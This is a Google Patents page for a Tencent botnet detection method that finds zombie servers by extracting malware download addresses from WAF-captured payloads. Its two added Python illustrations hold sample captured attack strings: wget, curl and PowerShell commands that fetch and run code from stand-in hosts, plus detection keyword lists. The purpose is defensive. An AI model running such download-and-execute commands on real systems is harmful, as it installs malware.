CN104796386A - Detection method, device and system of botnet - Google Patents


Info

Publication number: CN104796386A
Application number: CN201410027082.9A
Authority: CN (China)
Other versions: CN104796386B
Other languages: Chinese (zh)
Prior art keywords: data, payload, source address, source
Inventors: 江虎, 朱海星
Current assignee: Tencent Technology Shenzhen Co Ltd
Original assignee: Tencent Technology Shenzhen Co Ltd
Legal status: granted; active (status as listed by Google Patents, not a legal conclusion)
Events: application filed by Tencent Technology Shenzhen Co Ltd; priority to CN201410027082.9A; publication of CN104796386A; application granted; publication of CN104796386B; legal status active.


Abstract

The invention provides a botnet detection method, device and system for the field of computer network security. The method comprises: obtaining attack behavior data captured at a network node; parsing the attack behavior data to obtain the payload it contains; searching the payload for the source address from which a malicious program is downloaded and the source IP that sent the download request; and determining the computers in the botnet from that source address and source IP. Compared with the name-matching approach of the prior art, the botnet detection method of the invention effectively avoids false positives and false negatives and improves detection accuracy.

Description

Botnet detection method, device and system
Technical field
The invention belongs to the field of computer network security, and in particular relates to a botnet detection method, device and system.
Background technology
A botnet is a one-to-many control network formed between a controller and a large number of hosts that have been infected with a bot program through one or more communication means. The infected hosts are called zombie computers, and the host that controls them is called the zombie server.
As network bandwidth and the hardware performance of computers and network equipment have increased, botnets propagate faster and faster and their activity is increasingly rampant. A botnet forms an attack platform from which various attacks can be launched effectively, such as denial-of-service attacks, sending spam, stealing secrets, abusing resources and botnet mining. These can bring down entire infrastructure networks or important application systems, cause large-scale leaks of secrets or personal privacy, or be used for other illegal activities such as online fraud, and their harm is extremely serious.
To detect botnets effectively and reduce the harm they bring, the prior art usually detects botnets by user nickname. Because the rules governing those nicknames have to be found by statistics, false negatives or false positives may occur, and detection accuracy is not high.
Summary of the invention
The object of the embodiments of the present invention is to provide a botnet detection method that solves the problem that, when the prior art uses user nicknames to detect botnets, false negatives or false positives occur easily and detection accuracy is not high.
The embodiments of the present invention are realized as follows. A botnet detection method comprises:
obtaining attack data captured at a network node;
parsing the attack data to obtain the payload data it contains, the payload data being the code section in the attack data that carries out the malicious action;
searching the payload data for the source address from which a malicious program is downloaded and the source IP that sent the download request;
determining the computers in the botnet from the source address and the source IP.
Another object of the embodiments of the present invention is to provide a botnet detection device, comprising:
a data receiving unit for obtaining attack data captured at a network node;
a parsing and acquiring unit for parsing the attack data to obtain the payload data it contains, the payload data being the code section in the attack data that carries out the malicious action;
a search unit for searching the payload data for the source address from which a malicious program is downloaded and the source IP that sent the download request;
a determining unit for determining the computers in the botnet from the source address and the source IP.
The embodiments of the present invention further provide a botnet detection system comprising data capture devices deployed at each node location of the monitored network and a data analysis server connected to each data capture device. The data capture devices obtain the attack data transmitted at the network node. The data analysis server receives the attack data captured by the data capture device at each node location, obtains the payload data contained in the attack data, searches the payload data for the source address from which a malicious program is downloaded and the source IP that sent the download request, and determines the computers in the botnet from the source address and the source IP.
In the embodiments of the present invention, the attack data captured at a network node is obtained, the payload it contains is extracted, the payload is searched for the source address from which the malicious program it contains is downloaded and the IP that sent the download request, and the computers in the botnet are determined from that source address and source IP. Based on the behavioral characteristic of botnet propagation, the invention searches the attack data captured at the network node for the download source address of the malicious program contained in the payload and the source IP that sent the download request, and thereby determines the computers in the botnet. Compared with the name-matching approach of the prior art, the botnet detection method of the invention effectively avoids false positives and false negatives and improves detection accuracy.
Brief description of the drawings
Fig. 1 is a flowchart of the botnet detection method provided by the first embodiment of the invention;
Fig. 2 is a flowchart of the botnet detection method provided by the second embodiment of the invention;
Fig. 3 is a schematic structural diagram of the botnet detection system provided by the third embodiment of the invention;
Fig. 4 is a schematic diagram of the botnet detection system provided by the third embodiment of the invention applied to network detection;
Fig. 5 is a structural block diagram of the botnet detection device provided by the fourth embodiment of the invention;
Fig. 6 is a schematic structural diagram of the device provided by the fifth embodiment of the invention.
Detailed description
To make the objects, technical solutions and advantages of the present invention clearer, the invention is further elaborated below with reference to the drawings and embodiments. It should be understood that the specific embodiments described here serve only to explain the invention and are not intended to limit it.
As web applications become ever richer, web servers, with their powerful computing capability, processing performance and the high-value content they hold, have gradually become the primary attack target, facing injection attacks, information leakage, weak-password attacks and the like. Among these, attacks on servers by the numerous computers controlled by a botnet are also a common form of attack.
To discover botnets in time and find the computers that have been compromised, a common current method detects botnets by user nickname. Because the names (nicknames) of the so-called users that join the zombie server are generated by the bot program, the nicknames of these bots follow some generating algorithm and show a certain regularity. For example, in an IP-address representation the three-letter country abbreviation of the infected host's IP address is placed at the beginning, followed by a random number of specified length, as in USA|8028032 or CHA|8920340; in a system representation the operating system of the infected host is used as the leading letters, such as xp or 2000, followed by a random number of specified length, as in xp|8034 or 2000|80956. The characteristics of these names can be found and summarized from obtained bot source code. The regularity of these user nicknames differs from the randomness of normal IRC user nicknames, so an IRC botnet in the network can be identified by matching the nickname as a characteristic string against the characteristics of the HTTP data. However, because the nickname rules in this method have to be found by statistics, false negatives or false positives may occur, and detection accuracy is not high.
To analyze and identify botnets quickly and effectively, the botnet detection method of the present invention comprises: obtaining attack data captured at a network node; parsing the attack data to obtain the payload data it contains, the payload data being the code section in the attack data that carries out the malicious action; searching the payload data for the source address from which the malicious program is downloaded and the source IP that sent the download request; and determining the computers in the botnet from the source address and the source IP.
Based on the behavioral characteristic of botnet propagation, the invention searches the attack data captured at the network node for the download source address of the malicious program contained in the payload and the source IP that sent the download request, and thereby determines the computers in the botnet. Compared with the name-matching approach of the prior art, the botnet detection method of the invention effectively avoids false positives and false negatives and improves detection accuracy.
Embodiment one:
Fig. 1 shows the flow of the botnet detection method provided by the first embodiment of the invention, described in detail as follows:
In step S101, attack data captured at a network node is obtained.
Specifically, the attack data captured at the network node can be obtained through a Web application firewall (WAF) system deployed at the network node, with the WAF system capturing the attack data, or through an active intrusion prevention system (IPS).
An intrusion prevention system (IPS) is a computer network security device that supplements anti-virus software and firewalls (packet filters, application gateways). An IPS monitors the network data transmission behavior of a network or network device and can instantly interrupt, adjust or isolate abnormal or harmful network data transmission behavior.
A Web application firewall (WAF) protects against attacks on current web applications. Unlike a traditional firewall, a WAF works at the application layer, detecting and protecting the HTTP requests and responses that pass through it on the basis of known attack signature rules. In terms of functional architecture, a WAF comprises a protection engine and attack signature rules.
The concrete protection process in a network architecture that applies a WAF is as follows. When an HTTP request from the Internet needs to access a back-end web server, the request first passes through router forwarding and the protection of the traditional firewall and then reaches the WAF. The WAF's protection engine scans the received HTTP request with the rules; when attack data is found, the attack data is captured, and the request may also be handled by interception, dropping, disconnection and other means. The request that has passed through the WAF finally reaches the web server in the server farm that corresponds to the HTTP request. Of course, the WAF may also receive requests from the corporate intranet and protect them in the same way.
The attack data may specifically be the full content of the request, or only the part of its data code used to carry out the malicious act.
In step S102, the attack data is parsed to obtain the payload data it contains, the payload data being the code section in the attack data that carries out the malicious action.
A Trojan or other malicious program usually performs some harmful or malicious action. A Trojan, for example, disguises itself to lure the user into downloading and executing it, giving the person who planted it a way into the victim's computer so that the planter can damage or steal the victim's files at will and even remotely control the computer. Other malware, such as worms, can destroy files on the computer by continually copying themselves to other computers. The code section in the attack data that carries out these malicious actions is called the payload. Different viruses perform different malicious actions, so a payload can do anything a program running in the victim's environment can do; the actions it performs may include destroying or safely deleting files, sending sensitive information to the virus author or any recipient, and providing a back door into the infected computer.
A virus generally consists of two parts: the payload and an obfuscation part. The payload is the code that performs the malicious action, while the obfuscation part is what the virus uses to protect itself from being removed.
To analyze the malicious behavior effectively, the payload data contained in the virus must first be extracted. The step of parsing the attack data to obtain the payload data it contains may specifically be:
comparing the attack data with the keywords of predefined malicious-action code to judge whether the attack data contains a keyword of the predefined malicious-action code;
if it contains such a keyword, determining that the line or statement in which the malicious-action code keyword is located is payload data.
The keywords of the predefined malicious-action code can be obtained from the virus keyword database contained in the latest virus database, or can of course be defined by the user as required.
In step S103, the payload data is searched for the source address from which the malicious program is downloaded and the source IP that sent the download request.
The propagation of the most common botnets today is based on the IRC (Internet Relay Chat) protocol, an application-layer protocol in which an IRC server and chat channels carry the actual conversation. IRC uses a client/server model: a client connects to the IRC server, a user can create or join channels of interest, and each user can send messages to all other users in a channel or to an individual user. The channel administrator can set channel attributes, such as a password or hidden mode.
The attacker writes an IRC bot program that supports only part of the IRC commands and interprets received messages as commands to execute. After writing the bot and setting up an IRC server, the attacker can implant the bot on user computers in various ways: active propagation by worms; directly compromising computers through system vulnerabilities; social engineering, tricking users into downloading and running the bot via e-mail or instant messaging; the DCC command of the IRC protocol, propagating directly through the IRC server; or embedding malicious code in web pages and waiting for users to browse them.
Once the bot runs on an infected computer, it connects to a specific IRC server with a random nickname and a built-in password and joins a designated channel. The attacker can log in to the channel at any time and send an authentication message; once authenticated, the attacker immediately sends control commands to the active bots (or to temporarily inactive ones). The zombie computer reads every message sent to the channel, or the channel topic, and immediately executes any command it recognizes from the authenticated attacker.
These commands usually involve updating the bot, uploading or downloading specified files, remote-control connections, launching denial-of-service attacks, opening proxy servers and so on.
As the bot spreads rapidly on a large scale, computers that originally had no connection with one another are, by the bot's default instructions, gradually connected to the IRC server designated by the attacker and placed under the attacker's control, forming a huge network system: this is how a botnet forms. The attacker then uses this platform to launch further and more covert intrusions.
Therefore, as a botnet develops it must continually download malicious programs such as bots and Trojans from the zombie server in order to infect more computers.
The step of searching the payload data for the source address from which the malicious program is downloaded and the source IP that sent the download request may specifically comprise:
comparing the payload data with predefined download keywords to find the download keywords contained in the payload data;
from the download keywords found in the payload data, determining the source address from which the corresponding malicious program is downloaded and the source IP that sent the download request.
Of course, looking up the payload data and the download source address and requesting source IP by keywords in steps S102 and S103 is only one preferred implementation; those skilled in the art will understand that other means, such as program structure analysis, can also be used to find the corresponding data.
In step S104, the computers in the botnet are determined from the source address and the source IP.
By the propagation characteristic of botnets, the attack data sent by a zombie computer, whose payload issues a malicious-program download request, differs in form from the requests of ordinary computer users. Once the download source address of the malicious program contained in the payload data and the source IP that sent the download request have been obtained (namely the download link and the source IP of the request that fetches the malicious program through that download request), the addresses of the zombie computers and the zombie server in the botnet can be derived from the source address information and the source IP address information.
In the embodiment of the present invention, the attack data captured at a network node is obtained, the payload it contains is extracted, the payload is searched for the source address from which the malicious program it contains is downloaded and the IP that sent the download request, and the computers in the botnet are determined from that source address and source IP. Based on the behavioral characteristic of botnet propagation, the invention searches the attack data captured at the network node for the download source address of the malicious program contained in the payload and the source IP that sent the download request, and thereby determines the computers in the botnet. Compared with the name-matching approach of the prior art, the botnet detection method of the invention effectively avoids false positives and false negatives and improves detection accuracy.
Embodiment two:
Fig. 2 shows the flow of the botnet detection method provided by the second embodiment of the invention, described in detail as follows:
In step S201, attack data captured at a network node is obtained.
In step S202, the attack data is parsed to obtain the payload data it contains, the payload data being the code section in the attack data that carries out the malicious action.
In step S203, the payload data is searched for the source address from which the malicious program is downloaded and the source IP that sent the download request.
In step S204, it is judged from the payload data whether the number of times the same malicious-program download source address has been sent by different computers exceeds a predetermined number.
On some occasions a user may accidentally trigger a download request for a malicious program, for instance by clicking on an illegal website that triggers the download; in such a case the computer that accidentally triggered the download request may be misjudged.
To avoid this, step S204 of the embodiment counts the occurrences of the same malicious-program download source address sent in the payloads. When the count exceeds the predetermined number, judgment proceeds to step S205; otherwise the computer corresponding to the download request source and the computer corresponding to the malicious-program download source address can be judged on a separate basis.
Furthermore, to prevent the same computer's repeated download requests from inflating the count, different computers must also be distinguished when counting download requests, so that more meaningful statistics are obtained.
In step S205, if the number of times the same malicious-program download source address has been sent by different computers exceeds the predetermined number, the host corresponding to that download source address is determined to be the zombie server, and the computers corresponding to the source IPs that sent the corresponding download requests are determined to be zombie computers.
When the number of times the same malicious-program download source address has been sent by different computers exceeds the predetermined number, the malicious programs downloaded in the attack-request payloads from multiple different sources all point to the same download source, and this is regarded as a botnet attack. This batch of attack sources, i.e. the senders of the corresponding download requests, are identified as compromised, controlled zombie computers; the download source, i.e. the host corresponding to the malicious-program download source address, is judged to be a botnet node or zombie server.
Compared with embodiment one, this embodiment adds the step of judging whether the number of times the same malicious-program download source address has been sent by different computers exceeds a predetermined number to the conditions for identifying a botnet. This avoids misjudgments caused by accidental user triggering when identifying a botnet and further improves detection accuracy.
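The steps of embodiment one and the distinct-computer threshold of embodiment two, worked through as an added Python illustration that is not the patent's own code. The malicious-action keywords, the download keywords, the record format and the sample captured requests are constructed assumptions, not values from the patent:

```python
"""Botnet detection over attack records captured at a network node, following
embodiment one (steps S101-S104) and embodiment two (the distinct-source
threshold of steps S204-S205). Added illustration, not the patent's code:
the keyword lists, the record format and the sample requests are constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed stand-ins for the "predefined malicious-action code keywords"
# (step S102) and the "predefined download keywords" (step S103).
MALICIOUS_KEYWORDS = ("wget", "curl", "chmod", "/bin/sh", "cmd.exe", "powershell")
DOWNLOAD_KEYWORDS = ("wget", "curl", "tftp", "DownloadFile")

# A download keyword, then anything up to the URL it fetches, within one statement.
_DOWNLOAD_RE = re.compile(
    r"(?:%s)[^\n;|&]*?(?P<url>(?:https?|ftp|tftp)://[^\s;|&'\"]+)"
    % "|".join(map(re.escape, DOWNLOAD_KEYWORDS)),
    re.IGNORECASE,
)


def extract_payload(attack_data: str) -> list:
    """Step S102: split the captured attack data into statements and keep
    those containing a malicious-action keyword; they form the payload."""
    statements = (s.strip() for s in re.split(r"[\n;]", attack_data))
    return [s for s in statements
            if s and any(k.lower() in s.lower() for k in MALICIOUS_KEYWORDS)]


def find_download_sources(payload: list) -> list:
    """Step S103: for each download keyword in the payload, return the host
    of the URL it fetches, i.e. the malicious-program download source."""
    sources = []
    for statement in payload:
        for match in _DOWNLOAD_RE.finditer(statement):
            host = urlsplit(match.group("url")).hostname
            if host:
                sources.append(host.lower())
    return sources


def detect_botnet(records, threshold: int):
    """Steps S101-S105. `records` are (source_ip, attack_data) pairs captured
    by the WAF/IPS. Each download source is credited once per *distinct*
    source IP (embodiment two: repeats from one machine do not add up).
    Returns (confirmed, below_threshold), both mapping download source host
    -> sorted requesting IPs. A host in `confirmed` was requested by more
    than `threshold` different computers, so it is the zombie server and
    the IPs are zombie computers; hosts below the threshold are left for
    separate judgment, which filters an accidental single-user download."""
    requesters = defaultdict(set)
    for source_ip, attack_data in records:
        for host in find_download_sources(extract_payload(attack_data)):
            requesters[host].add(source_ip)
    confirmed, below_threshold = {}, {}
    for host, ips in requesters.items():
        bucket = confirmed if len(ips) > threshold else below_threshold
        bucket[host] = sorted(ips)
    return confirmed, below_threshold


# Constructed sample: injected commands as a WAF would capture them, using
# documentation-range addresses (RFC 5737) in place of real hosts.
SAMPLE_RECORDS = [
    # three different computers fetch the same file from the same source
    ("198.51.100.11", "id=1; wget http://203.0.113.9/bot.sh -O /tmp/b; chmod +x /tmp/b; /tmp/b"),
    ("198.51.100.12", "cd /tmp && curl -o x http://203.0.113.9/bot.sh && sh x"),
    ("198.51.100.13", "q=';wget http://203.0.113.9/bot.sh;'"),
    # the same computer again: must not be counted twice
    ("198.51.100.13", "q=';wget http://203.0.113.9/bot.sh;'"),
    # one accidental fetch of another file: stays below the threshold
    ("198.51.100.20", "powershell -c (New-Object Net.WebClient).DownloadFile('http://192.0.2.77/p.exe','p.exe')"),
    # a keyword hit with no download URL yields payload but no source
    ("198.51.100.30", "search=wget manual"),
]

if __name__ == "__main__":
    confirmed, pending = detect_botnet(SAMPLE_RECORDS, threshold=2)
    for host, ips in confirmed.items():
        print("zombie server", host, "zombie computers", ", ".join(ips))
    for host, ips in pending.items():
        print("below threshold", host, "requested by", ", ".join(ips))
```

With the threshold set to 2, the three distinct requesters of 203.0.113.9 confirm it as the zombie server, while the single accidental fetch from 192.0.2.77 is held back, which is exactly the misjudgment embodiment two is designed to avoid.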
Embodiment three:
Fig. 3 shows the schematic structure of the botnet detection system provided by the third embodiment of the invention, described in detail as follows:
The botnet detection system described in this embodiment comprises data capture devices deployed at each node location of the monitored network and a data analysis server connected to each data capture device. The data capture devices obtain the attack data transmitted at the network node. The data analysis server receives the attack data captured by the data capture device at each node location, obtains the payload data contained in the attack data, searches the payload data for the source address from which a malicious program is downloaded and the source IP that sent the download request, and determines the computers in the botnet from the source address and the source IP.
In Fig. 3, the network node can be the main core switch node or another important switch that forwards or exchanges data between the computers connected to it.
The data capture device may be a WAF system deployed at the network node; other data filters may of course be used to screen the required data, the WAF system in Fig. 3 being just one preferred implementation.
The data analysis server connects to each data capture device, parses the attack data obtained by the data capture devices to obtain the payload data it contains, searches the payload data for the source address from which the malicious program is downloaded and the source IP that sent the download request, and determines the computers in the botnet accordingly.
The data analysis server specifically also judges, from the payload data, whether the number of times the same malicious-program download source address has been sent by different computers exceeds a predetermined number; if it does, the host corresponding to that download source address is determined to be the zombie server, and the computers corresponding to the source IPs that sent the corresponding download requests are determined to be zombie computers.
The data analysis server described in this embodiment may also be distributed across or integrated into each network node location, or each network node may send its data to the same independent data analysis server.
In the application diagram of Fig. 4 for the botnet detection system of the third embodiment, a zombie server controls multiple zombie computers, namely attack source 1 to attack source N in Fig. 3. Through the routing and forwarding of the core switch, attack data containing the virus is sent to the attacked server; after being attacked, the server performs the corresponding operation and downloads malicious programs such as Trojans, and the attacked server can then be controlled by the zombie server. In this embodiment a Web application firewall (WAF) system is attached in bypass to the core switch; the WAF system captures the attack data and forwards the behavior data to the data analysis server for analysis.
The system described in this embodiment corresponds to the method described in embodiments one and two: by searching the attack data captured at the network node for the download source address of the malicious program contained in the payload and the source IP that sent the download request, it effectively determines the computers in the botnet. Compared with the name-matching approach of the prior art, the botnet detection method of the invention effectively avoids false positives and false negatives and improves detection accuracy.
Embodiment four:
Fig. 5 shows the structural block diagram of the botnet detection device provided by the fourth embodiment of the invention, described in detail as follows:
The botnet detection device described in this embodiment comprises:
a data receiving unit 501 for obtaining attack data captured at a network node;
a parsing and acquiring unit 502 for parsing the attack data to obtain the payload data it contains, the payload data being the code section in the attack data that carries out the malicious action;
a search unit 503 for searching the payload data for the source address from which a malicious program is downloaded and the source IP that sent the download request;
a determining unit 504 for determining the computers in the botnet from the source address and the source IP.
Further, the data receiving unit 501 is specifically for receiving attack data captured at the network node, the attack data being captured by a Web application firewall (WAF) system or intrusion prevention system (IPS) deployed at the network node.
Further, the parsing and acquiring unit 502 comprises:
a first comparison subunit for comparing the attack data with the keywords of predefined malicious-action code and judging whether the attack data contains a keyword of the predefined malicious-action code;
a payload determination subunit for determining, if a keyword of the predefined malicious-action code is contained, that the line or statement in which the malicious-action code keyword is located is payload data.
Further, the determining unit 504 comprises:
a judgment subunit for judging, from the payload data, whether the number of times the same malicious-program download source address has been sent by different computers exceeds a predetermined number;
a botnet determination subunit for determining, if that number exceeds the predetermined number, that the host corresponding to the malicious-program download source address is the zombie server and that the computers corresponding to the source IPs that sent the corresponding download requests are zombie computers.
Further, the search unit 503 comprises:
a second comparison subunit for comparing the payload data with predefined download keywords and finding the download keywords contained in the payload data;
an address determination subunit for determining, from the download keywords found in the payload data, the source address from which the corresponding malicious program is downloaded and the source IP that sent the download request.
The botnet detection device described in this embodiment corresponds to the botnet detection method described in embodiments one to three and is not repeated here.
Embodiment five:
Fig. 6 is a structural block diagram of the terminal provided in the fifth embodiment of the invention. The terminal described in this embodiment comprises components such as a memory 620, a network module 670, a processor 680 and a power supply 690. Those skilled in the art will understand that the terminal structure shown in Fig. 6 does not limit the terminal, which may comprise more or fewer components than shown, combine certain components, or arrange the components differently.
Each component of the terminal is described in detail below with reference to Fig. 6:
The memory 620 can be used to store software programs and modules; the processor 680 executes the various functional applications and data processing of the terminal by running the software programs and modules stored in the memory 620. The memory 620 may mainly comprise a program storage area and a data storage area, where the program storage area can store the operating system and the application programs required by at least one function (such as a sound playback function or an image playback function), and the data storage area can store data created according to the use of the terminal (such as audio data or a phone book). In addition, the memory 620 may comprise high-speed random access memory and may also comprise non-volatile memory, such as at least one magnetic disk storage device, a flash memory device, or other volatile solid-state storage components.
The network module 670 may comprise a Wireless Fidelity (WiFi) module, a wired network module or a radio-frequency module. The WiFi module belongs to short-range wireless transmission technology; through the network module 670 the terminal can help the user send and receive e-mail, browse web pages and access streaming video, providing the user with wireless broadband Internet access. Although Fig. 6 shows the network module 670, it is understood that it is not an essential component of the terminal and may be omitted as needed without changing the essence of the invention.
The processor 680 is the control center of the terminal. It connects the various parts of the whole terminal through various interfaces and lines, and performs the various functions and data processing of the terminal by running or executing the software programs and/or modules stored in the memory 620 and calling the data stored in the memory 620, thereby monitoring the terminal as a whole. Optionally, the processor 680 may comprise one or more processing units; preferably, the processor 680 may integrate an application processor and a modem processor, where the application processor mainly handles the operating system, user interface and application programs, and the modem processor mainly handles wireless communication. It is understood that the modem processor need not be integrated into the processor 680.
The terminal also comprises a power supply 690 (such as a battery) that powers the components; preferably, the power supply can be logically connected to the processor 680 through a power management system, so that functions such as charging, discharging and power consumption management are implemented through the power management system.
Although not shown, the terminal may also comprise input devices, a display device, an audio circuit, a camera, a Bluetooth module and so on, which are not repeated here.
In this embodiment of the invention, the processor 680 included in the terminal also has the following function: performing the botnet detection method, comprising:
obtaining attack behavior data captured at a network node;
parsing the attack behavior data to obtain the payload data it contains, the payload data being the code segment in the attack behavior data that carries out the malicious behavior;
searching the payload data for the source address from which the malicious program is downloaded and the source IP that sent the download request;
determining the computers in the botnet according to the source address and the source IP.
The foregoing are only preferred embodiments of the invention and are not intended to limit it; any modifications, equivalent substitutions and improvements made within the spirit and principles of the invention shall be included within the scope of protection of the invention.

Claims (13)

1. A botnet detection method, characterized in that the method comprises:
obtaining attack behavior data captured at a network node;
parsing the attack behavior data to obtain the payload data it contains, the payload data being the code segment in the attack behavior data that carries out the malicious behavior;
searching the payload data for the source address from which the malicious program is downloaded and the source IP that sent the download request;
determining the computers in the botnet according to the source address and the source IP.
2. The method according to claim 1, characterized in that the step of obtaining attack behavior data captured at a network node is specifically:
receiving attack behavior data captured at a network node, the attack behavior data being captured by a Web application firewall (WAF) system or an intrusion prevention system (IPS) deployed at the network node.
3. The method according to claim 1, characterized in that the step of parsing the attack behavior data to obtain the payload data it contains comprises:
comparing the attack behavior data with the keywords of predefined malicious-behavior execution code, and judging whether the attack behavior data contain any such keyword;
if a keyword of the predefined malicious-behavior execution code is present, determining that the line or statement containing that keyword is the payload data.
4. The method according to claim 1, characterized in that determining the computers in the botnet according to the source address and the source IP is specifically:
judging, within the payload data, whether the number of times the same malware download source address is sent by different computers exceeds a predetermined number;
if that number exceeds the predetermined number, determining that the host corresponding to the malware download source address is a zombie server and that the computers corresponding to the source IPs that sent the corresponding download requests are zombie computers.
5. The method according to claim 1, characterized in that the step of searching the payload data for the source address from which the malicious program is downloaded and the source IP that sent the download request specifically comprises:
comparing the payload data with predefined download keywords, and searching the payload data for the download keywords they contain;
according to the download keywords found in the payload data, determining the source address from which the malicious program corresponding to the download keyword is downloaded and the source IP that sent the download request.
6. A botnet detection device, characterized in that the device comprises:
a data receiving unit, configured to obtain attack behavior data captured at a network node;
a parsing and acquisition unit, configured to parse the attack behavior data and obtain the payload data contained in it, the payload data being the code segment in the attack behavior data that carries out the malicious behavior;
a search unit, configured to search the payload data for the source address from which the malicious program is downloaded and the source IP that sent the download request;
a determining unit, configured to determine the computers in the botnet according to the source address and the source IP.
7. The device according to claim 6, characterized in that the data receiving unit is specifically configured to receive attack behavior data captured at a network node, the attack behavior data being captured by a Web application firewall (WAF) system or an intrusion prevention system (IPS) deployed at the network node.
8. The device according to claim 6, characterized in that the parsing and acquisition unit comprises:
a first comparison subunit, configured to compare the attack behavior data with the keywords of predefined malicious-behavior execution code and to judge whether the attack behavior data contain any such keyword;
a payload determination subunit, configured to determine, if a keyword of the predefined malicious-behavior execution code is present, that the line or statement containing that keyword is the payload data.
9. The device according to claim 6, characterized in that the determining unit comprises:
a judgment subunit, configured to judge, within the payload data, whether the number of times the same malware download source address is sent by different computers exceeds a predetermined number;
a botnet determination subunit, configured to determine, if that number exceeds the predetermined number, that the host corresponding to the malware download source address is a zombie server and that the computers corresponding to the source IPs that sent the corresponding download requests are zombie computers.
10. The device according to claim 6, characterized in that the search unit comprises:
a second comparison subunit, configured to compare the payload data with predefined download keywords and to search the payload data for the download keywords they contain;
an address determination subunit, configured to determine, according to the download keywords found in the payload data, the source address from which the malicious program corresponding to the download keyword is downloaded and the source IP that sent the download request.
11. A botnet detection system, characterized in that the system comprises data capture devices arranged at each node location in the detected network and a data analysis server connected to each data capture device; the data capture devices are configured to obtain the attack behavior data transmitted at the network nodes, and the data analysis server is configured to receive the attack behavior data captured by the data capture devices at each node location, obtain the payload data contained in the attack behavior data, search the payload data for the source address from which the malicious program is downloaded and the source IP that sent the download request, and determine the computers in the botnet according to the source address and the source IP.
12. The system according to claim 11, characterized in that the data capture device is a Web application firewall (WAF) system deployed at the network node.
13. The system according to claim 11, characterized in that the data analysis server is specifically configured to judge, within the payload data, whether the number of times the same malware download source address is sent by different computers exceeds a predetermined number, and, if so, to determine that the host corresponding to the malware download source address is a zombie server and that the computers corresponding to the source IPs that sent the corresponding download requests are zombie computers.
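As an added worked example (not the patent's own code), the following Python carries out the procedure of claims 1, 3, 4 and 5 and of the device in embodiment four over constructed WAF-style records: it isolates the payload line by predefined malicious-behavior keywords, extracts the download source address through the download keywords, and flags an address as a zombie server once more than a predetermined number of distinct source IPs have requested it. The keyword lists, the record format and the threshold are assumptions, since the patent only calls them predefined.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Assumed keyword sets; the patent only says they are "predefined".
MALICIOUS_KEYWORDS = ("wget", "curl", "tftp", "chmod", "/tmp/", "base64 -d")
DOWNLOAD_KEYWORDS = ("wget", "curl", "tftp")
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s;&|'\"<>]+")


def extract_payload(attack_data):
    """Claim 3: the first line or statement of the captured request that
    contains a malicious-behavior keyword is taken as the payload data."""
    for stmt in re.split(r"[\n;]", attack_data):
        if any(k in stmt for k in MALICIOUS_KEYWORDS):
            return stmt.strip()
    return None  # no payload line: not a download-type attack record


def find_download_source(payload):
    """Claim 5: if the payload carries a download keyword, return the
    address the malware is fetched from (the download source address)."""
    if payload is None or not any(k in payload for k in DOWNLOAD_KEYWORDS):
        return None
    m = URL_RE.search(payload)
    return m.group(0) if m else None


def detect_botnet(records, threshold):
    """Claim 4: group requesting source IPs per download source address and
    keep the addresses requested by more than `threshold` distinct computers.
    records: iterable of (source_ip, attack_data) as a WAF would hand over.
    Returns {download_address: sorted zombie computer IPs}."""
    requesters = defaultdict(set)
    for src_ip, data in records:
        addr = find_download_source(extract_payload(data))
        if addr:
            requesters[addr].add(src_ip)  # a set: the same computer counts once
    return {a: sorted(ips) for a, ips in requesters.items() if len(ips) > threshold}


def zombie_servers(result):
    """The hosts of the flagged download addresses are the zombie servers."""
    return sorted({urlparse(a).hostname for a in result})


# Constructed sample records: source IP plus decoded request as a WAF might log it.
SAMPLE = [
    ("203.0.113.10", "GET /shell?cd /tmp;wget http://192.0.2.50/bins/x86;chmod +x x86;./x86"),
    ("203.0.113.11", "POST /cgi-bin/login\nuser=a&pass=b;curl -O http://192.0.2.50/bins/x86"),
    ("203.0.113.12", "GET /shell?wget http://192.0.2.50/bins/x86 -O /tmp/x86"),
    ("203.0.113.10", "GET /shell?wget http://192.0.2.50/bins/x86 -O /tmp/x86"),  # repeat IP
    ("198.51.100.7", "GET /admin?cmd=wget http://203.0.113.99/payload.sh"),      # one requester
    ("198.51.100.8", "GET /index.php?id=1' OR '1'='1"),                          # no payload line
]

if __name__ == "__main__":
    found = detect_botnet(SAMPLE, threshold=2)
    print("zombie servers:", zombie_servers(found))
    for addr, ips in found.items():
        print(addr, "<- zombie computers:", ips)
```

The repeated request from 203.0.113.10 is counted once and the single-requester address is left out, which is the "different computers" condition of claim 4 rather than a raw hit count.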
Application CN201410027082.9A, priority date 2014-01-21, filing date 2014-01-21: Botnet detection method, device and system (Active; granted as CN104796386B).

Publications (2)

CN104796386A (en), published 2015-07-22
CN104796386B (en), published 2020-02-11
